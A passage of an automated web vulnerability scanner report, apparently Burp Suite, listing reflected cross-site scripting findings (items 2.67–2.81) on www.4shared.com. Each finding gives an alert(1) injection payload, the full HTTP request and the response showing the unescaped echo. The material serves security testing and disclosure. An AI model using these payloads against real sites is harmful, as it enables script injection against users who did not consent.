Content-Length: 38795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/Jsonp.jsd6306"-alert(1)-"2b949987eec";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.67. http://www.4shared.com/js/Jsonp.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/Jsonp.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2b3b'-alert(1)-'5c843333b1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/Jsonp.jsb2b3b'-alert(1)-'5c843333b1c?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/Jsonp.jsb2b3b'-alert(1)-'5c843333b1c
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:08 GMT
Content-Length: 38793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/Jsonp.jsb2b3b'-alert(1)-'5c843333b1c',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.68. http://www.4shared.com/js/UploadModule.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/UploadModule.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e57b"-alert(1)-"ca14281641e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js4e57b"-alert(1)-"ca14281641e/UploadModule.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js4e57b&quot;-alert(1)-&quot;ca14281641e/UploadModule.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:11 GMT
Content-Length: 38826


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js4e57b"-alert(1)-"ca14281641e/UploadModule.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

2.69. http://www.4shared.com/js/UploadModule.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/UploadModule.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c24'-alert(1)-'bf67b21616d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsa6c24'-alert(1)-'bf67b21616d/UploadModule.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /jsa6c24'-alert(1)-'bf67b21616d/UploadModule.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:14 GMT
Content-Length: 38648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsa6c24'-alert(1)-'bf67b21616d/UploadModule.js',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.70. http://www.4shared.com/js/UploadModule.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/UploadModule.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40dac"-alert(1)-"83473083b8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/UploadModule.js40dac"-alert(1)-"83473083b8f?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/UploadModule.js40dac&quot;-alert(1)-&quot;83473083b8f
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:25 GMT
Content-Length: 38649


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/UploadModule.js40dac"-alert(1)-"83473083b8f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.71. http://www.4shared.com/js/UploadModule.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/UploadModule.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e48'-alert(1)-'75e7a4ce3cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/UploadModule.jsa7e48'-alert(1)-'75e7a4ce3cb?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/UploadModule.jsa7e48'-alert(1)-'75e7a4ce3cb
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:28 GMT
Content-Length: 38653


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/UploadModule.jsa7e48'-alert(1)-'75e7a4ce3cb',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.72. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bad43'-alert(1)-'fb83ad09a8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsbad43'-alert(1)-'fb83ad09a8e/account/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsbad43'-alert(1)-'fb83ad09a8e/account/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:25 GMT
Content-Length: 38846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsbad43'-alert(1)-'fb83ad09a8e/account/AccountFacade.js',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

2.73. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a8ce"-alert(1)-"f6aca5d2241 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js8a8ce"-alert(1)-"f6aca5d2241/account/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js8a8ce&quot;-alert(1)-&quot;f6aca5d2241/account/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:22 GMT
Content-Length: 38851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js8a8ce"-alert(1)-"f6aca5d2241/account/AccountFacade.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

2.74. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62407"-alert(1)-"c32d16a2212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/account62407"-alert(1)-"c32d16a2212/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/account62407&quot;-alert(1)-&quot;c32d16a2212/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:38 GMT
Content-Length: 38850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/account62407"-alert(1)-"c32d16a2212/AccountFacade.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

2.75. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3f62'-alert(1)-'6724e48becf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/accounta3f62'-alert(1)-'6724e48becf/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/accounta3f62'-alert(1)-'6724e48becf/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:40 GMT
Content-Length: 38853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/accounta3f62'-alert(1)-'6724e48becf/AccountFacade.js',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

2.76. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25ce4'-alert(1)-'a8e30789091 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/account/AccountFacade.js25ce4'-alert(1)-'a8e30789091?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/account/AccountFacade.js25ce4'-alert(1)-'a8e30789091
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:55 GMT
Content-Length: 38850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/account/AccountFacade.js25ce4'-alert(1)-'a8e30789091',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.77. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd956"-alert(1)-"eb47d8a0cf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/account/AccountFacade.jsbd956"-alert(1)-"eb47d8a0cf1?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/account/AccountFacade.jsbd956&quot;-alert(1)-&quot;eb47d8a0cf1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:53 GMT
Content-Length: 38848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/account/AccountFacade.jsbd956"-alert(1)-"eb47d8a0cf1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.78. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99656'-alert(1)-'523266739b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js99656'-alert(1)-'523266739b1/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js99656'-alert(1)-'523266739b1/homeScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:01 GMT
Content-Length: 38624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js99656'-alert(1)-'523266739b1/homeScript.jsp',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}


...[SNIP]...

2.79. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 903c6"-alert(1)-"7ad83cf2909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js903c6"-alert(1)-"7ad83cf2909/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js903c6&quot;-alert(1)-&quot;7ad83cf2909/homeScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:59 GMT
Content-Length: 38802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js903c6"-alert(1)-"7ad83cf2909/homeScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

2.80. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bef0b"-alert(1)-"0416efb1ed1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/homeScript.jspbef0b"-alert(1)-"0416efb1ed1?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/homeScript.jspbef0b&quot;-alert(1)-&quot;0416efb1ed1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:10 GMT
Content-Length: 38618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/homeScript.jspbef0b"-alert(1)-"0416efb1ed1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.81. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b74'-alert(1)-'d49b274a034 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/homeScript.jsp79b74'-alert(1)-'d49b274a034?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/homeScript.jsp79b74'-alert(1)-'d49b274a034
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:12 GMT
Content-Length: 38620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/homeScript.jsp79b74'-alert(1)-'d49b274a034',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

